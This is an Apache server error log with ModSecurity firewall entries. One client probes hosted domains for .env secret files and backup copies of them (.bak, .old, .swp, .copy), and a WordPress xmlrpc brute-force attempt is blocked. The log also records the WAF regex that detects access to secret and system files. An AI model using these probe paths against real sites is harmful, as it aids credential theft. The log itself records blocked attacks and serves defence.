[Tue May 26 16:41:04.682067 2026] [security2:error] [pid 817651:tid 817826] [client 51.222.95.63:59262] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.dnvexpress.in"] [uri "/"] [unique_id "ahV_yNlGRCPPN1dS2y2oWQAAslA"]
[Tue May 26 16:41:05.466108 2026] [security2:error] [pid 817651:tid 817814] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_xtlGRCPPN1dS2y2oMQAAAKY"]
[Tue May 26 16:41:05.956600 2026] [security2:error] [pid 817651:tid 817894] [client 195.178.110.34:44492] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahV_ydlGRCPPN1dS2y2oeAAAAPY"]
[Tue May 26 16:41:06.987527 2026] [core:error] [pid 817651:tid 817898] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:06.987547 2026] [core:error] [pid 817651:tid 817898] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:07.100669 2026] [security2:error] [pid 817651:tid 817814] [client 103.131.71.161:0] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "aastha-enterprises.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV_y9lGRCPPN1dS2y2olQAAAKY"]
[Tue May 26 16:41:07.101095 2026] [security2:error] [pid 817651:tid 817799] [client 103.131.71.161:16593] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahV_y9lGRCPPN1dS2y2okwAAAJc"]
[Tue May 26 16:41:07.805992 2026] [security2:error] [pid 817651:tid 817817] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ydlGRCPPN1dS2y2oagAAAKk"]
[Tue May 26 16:41:08.450005 2026] [http2:info] [pid 823496:tid 823496] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:41:09.098560 2026] [core:error] [pid 817651:tid 817886] [client 208.84.100.196:7626] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.098577 2026] [core:error] [pid 817651:tid 817886] [client 208.84.100.196:7626] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.134673 2026] [security2:error] [pid 817651:tid 817817] [client 103.131.71.176:0] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "aastha-enterprises.com"] [uri "/international.html"] [unique_id "ahV_zdlGRCPPN1dS2y2oyQAAAKk"]
[Tue May 26 16:41:09.136135 2026] [core:error] [pid 817651:tid 817793] [client 208.84.100.196:7734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.136148 2026] [core:error] [pid 817651:tid 817793] [client 208.84.100.196:7734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.136367 2026] [core:error] [pid 817651:tid 817864] [client 208.84.100.196:7852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.136386 2026] [core:error] [pid 817651:tid 817864] [client 208.84.100.196:7852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.136389 2026] [security2:error] [pid 817651:tid 817904] [client 208.84.100.196:7640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahV_zdlGRCPPN1dS2y2oywAAAQA"]
[Tue May 26 16:41:09.136972 2026] [security2:error] [pid 817651:tid 817848] [client 208.84.100.196:7668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahV_zdlGRCPPN1dS2y2o3wAAAMg"]
[Tue May 26 16:41:09.137241 2026] [core:error] [pid 817651:tid 817883] [client 208.84.100.196:7904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137249 2026] [core:error] [pid 817651:tid 817845] [client 208.84.100.196:7934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137249 2026] [core:error] [pid 817651:tid 817830] [client 208.84.100.196:7812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137254 2026] [core:error] [pid 817651:tid 817883] [client 208.84.100.196:7904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137292 2026] [core:error] [pid 817651:tid 817845] [client 208.84.100.196:7934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137306 2026] [core:error] [pid 817651:tid 817830] [client 208.84.100.196:7812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137723 2026] [core:error] [pid 817651:tid 817841] [client 208.84.100.196:7784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.137735 2026] [core:error] [pid 817651:tid 817841] [client 208.84.100.196:7784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.138123 2026] [core:error] [pid 817651:tid 817827] [client 208.84.100.196:7796] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.138138 2026] [core:error] [pid 817651:tid 817827] [client 208.84.100.196:7796] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.138238 2026] [core:error] [pid 817651:tid 817906] [client 208.84.100.196:7930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.138249 2026] [core:error] [pid 817651:tid 817906] [client 208.84.100.196:7930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.138679 2026] [security2:error] [pid 817651:tid 817843] [client 103.131.71.176:28773] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "304"] [hostname "aastha-enterprises.com"] [uri "/international.html"] [unique_id "ahV_zdlGRCPPN1dS2y2oxwAAAMM"]
[Tue May 26 16:41:09.139290 2026] [security2:error] [pid 817651:tid 817784] [client 208.84.100.196:7672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahV_zdlGRCPPN1dS2y2o5AAAAIg"]
[Tue May 26 16:41:09.139511 2026] [core:error] [pid 817651:tid 817789] [client 208.84.100.196:7770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.139527 2026] [core:error] [pid 817651:tid 817789] [client 208.84.100.196:7770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.139534 2026] [core:error] [pid 817651:tid 817834] [client 208.84.100.196:7756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.139543 2026] [core:error] [pid 817651:tid 817834] [client 208.84.100.196:7756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.139935 2026] [security2:error] [pid 817651:tid 817785] [client 208.84.100.196:7658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahV_zdlGRCPPN1dS2y2o5QAAAIk"]
[Tue May 26 16:41:09.141972 2026] [core:error] [pid 817651:tid 817813] [client 208.84.100.196:7868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.141985 2026] [core:error] [pid 817651:tid 817813] [client 208.84.100.196:7868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142029 2026] [core:error] [pid 817651:tid 817820] [client 208.84.100.196:7828] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142045 2026] [core:error] [pid 817651:tid 817820] [client 208.84.100.196:7828] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142196 2026] [core:error] [pid 817651:tid 817868] [client 208.84.100.196:7744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142224 2026] [core:error] [pid 817651:tid 817868] [client 208.84.100.196:7744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142534 2026] [core:error] [pid 817651:tid 817878] [client 208.84.100.196:7704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142556 2026] [core:error] [pid 817651:tid 817878] [client 208.84.100.196:7704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142811 2026] [core:error] [pid 817651:tid 817903] [client 208.84.100.196:7890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.142825 2026] [core:error] [pid 817651:tid 817903] [client 208.84.100.196:7890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144290 2026] [core:error] [pid 817651:tid 817791] [client 208.84.100.196:7946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144302 2026] [core:error] [pid 817651:tid 817791] [client 208.84.100.196:7946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144418 2026] [core:error] [pid 817651:tid 817898] [client 208.84.100.196:7882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144431 2026] [core:error] [pid 817651:tid 817898] [client 208.84.100.196:7882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144419 2026] [core:error] [pid 817651:tid 817802] [client 208.84.100.196:7810] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.144485 2026] [core:error] [pid 817651:tid 817802] [client 208.84.100.196:7810] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.146555 2026] [core:error] [pid 817651:tid 817822] [client 208.84.100.196:7838] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.146571 2026] [core:error] [pid 817651:tid 817822] [client 208.84.100.196:7838] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.148178 2026] [core:error] [pid 817651:tid 817814] [client 208.84.100.196:7718] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.148193 2026] [core:error] [pid 817651:tid 817814] [client 208.84.100.196:7718] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.148286 2026] [core:error] [pid 817651:tid 817855] [client 208.84.100.196:7922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.148297 2026] [core:error] [pid 817651:tid 817855] [client 208.84.100.196:7922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.149355 2026] [core:error] [pid 817651:tid 817829] [client 208.84.100.196:7830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.149368 2026] [core:error] [pid 817651:tid 817829] [client 208.84.100.196:7830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.149791 2026] [core:error] [pid 817651:tid 817801] [client 208.84.100.196:7916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.149804 2026] [core:error] [pid 817651:tid 817801] [client 208.84.100.196:7916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.153744 2026] [core:error] [pid 817651:tid 817781] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.153760 2026] [core:error] [pid 817651:tid 817781] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.158848 2026] [core:error] [pid 823496:tid 823633] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.158862 2026] [core:error] [pid 823496:tid 823633] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.158916 2026] [core:error] [pid 823496:tid 823631] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.158929 2026] [core:error] [pid 823496:tid 823631] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:09.538828 2026] [security2:error] [pid 817651:tid 817863] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_y9lGRCPPN1dS2y2omgAAANc"]
[Tue May 26 16:41:10.051538 2026] [core:error] [pid 817651:tid 817787] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:10.051559 2026] [core:error] [pid 817651:tid 817787] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:10.192390 2026] [security2:error] [pid 817651:tid 817819] [client 117.198.37.168:52742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_ztlGRCPPN1dS2y2o_AAAAKs"]
[Tue May 26 16:41:10.192563 2026] [security2:error] [pid 817651:tid 817819] [client 117.198.37.168:52742] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_ztlGRCPPN1dS2y2o_AAAAKs"]
[Tue May 26 16:41:11.125135 2026] [security2:error] [pid 817651:tid 817840] [client 208.84.100.196:7640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.copy"] [unique_id "ahV_z9lGRCPPN1dS2y2pDgAAAMA"]
[Tue May 26 16:41:11.140406 2026] [core:error] [pid 817651:tid 817793] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:11.140428 2026] [core:error] [pid 817651:tid 817793] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:11.141642 2026] [core:error] [pid 823496:tid 823642] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:11.141670 2026] [core:error] [pid 823496:tid 823642] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.159329 2026] [core:error] [pid 817651:tid 817880] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.159361 2026] [core:error] [pid 817651:tid 817880] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.796175 2026] [security2:error] [pid 817651:tid 817896] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_zdlGRCPPN1dS2y2o9gAAAPg"]
[Tue May 26 16:41:12.982522 2026] [security2:error] [pid 817651:tid 817835] [client 208.84.100.196:8072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.bak"] [unique_id "ahV_0NlGRCPPN1dS2y2pPAAAALs"]
[Tue May 26 16:41:12.982558 2026] [security2:error] [pid 817651:tid 817781] [client 208.84.100.196:8140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.old"] [unique_id "ahV_0NlGRCPPN1dS2y2pNgAAAIU"]
[Tue May 26 16:41:12.982770 2026] [security2:error] [pid 817651:tid 817816] [client 208.84.100.196:8092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.backup"] [unique_id "ahV_0NlGRCPPN1dS2y2pOAAAAKg"]
[Tue May 26 16:41:12.982775 2026] [security2:error] [pid 817651:tid 817795] [client 208.84.100.196:8166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production~"] [unique_id "ahV_0NlGRCPPN1dS2y2pOgAAAJM"]
[Tue May 26 16:41:12.983002 2026] [security2:error] [pid 817651:tid 817890] [client 208.84.100.196:8032] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahV_0NlGRCPPN1dS2y2pMwAAAPI"]
